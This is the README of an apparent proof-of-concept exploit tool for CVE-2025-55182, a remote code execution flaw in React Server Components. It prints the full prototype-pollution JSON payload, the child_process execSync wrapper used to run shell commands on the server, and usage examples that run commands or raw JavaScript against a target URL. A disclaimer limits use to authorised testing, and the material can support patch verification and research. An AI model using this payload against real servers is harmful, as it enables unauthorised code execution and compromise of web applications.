CVE-2025-55182 - React Server Components RCE POC

This is POC for educational and security research purposes only. This vulnerability has been patched in the latest versions of the affected packages. Use this tool only on systems you own or have explicit permission to test. I am not liable for any legal actions taken against you.

Payload Construction

The exploit creates a specially crafted JSON object that abuses JavaScript's prototype chain:

{
  "then": "$1:__proto__:then",           // Pollutes the prototype chain
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": jsCode,                    // Injected malicious code
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

Command Wrapping

The POC supports two modes:

Standard Mode (default):

process.mainModule.require("child_process").execSync("YOUR_COMMAND");

Wraps shell commands for execution via Node.js child_process.

Raw Mode (--raw flag):

// Executes arbitrary JavaScript directly

Allows direct JavaScript code execution without shell command wrapping.

Usage

Basic Command Execution

bun run index.ts <command_file> <target_url>

Example:

# Create a command file
echo "whoami" > cmd.txt

# Execute against vulnerable endpoint
bun run index.ts cmd.txt http://localhost:3000

Raw JavaScript Mode

bun run index.ts --raw <js_file> <target_url>

Example:

# Create JavaScript payload
echo "require('fs').writeFileSync('/tmp/pwned.txt', 'RCE Success')" > payload.js

# Execute raw JavaScript
bun run index.ts --raw payload.js http://localhost:3000

Arguments

• <file_path>: Path to file containing the command or JavaScript code
• <target_url>: URL of the React Server Function endpoint
• --raw: (Optional) Execute raw JavaScript instead of shell commands

Attribution

Discovered by: Lachlan Davidson
Disclosed by: The React Team & Meta Security

References

• Official React Security Advisory
• CVE-2025-55182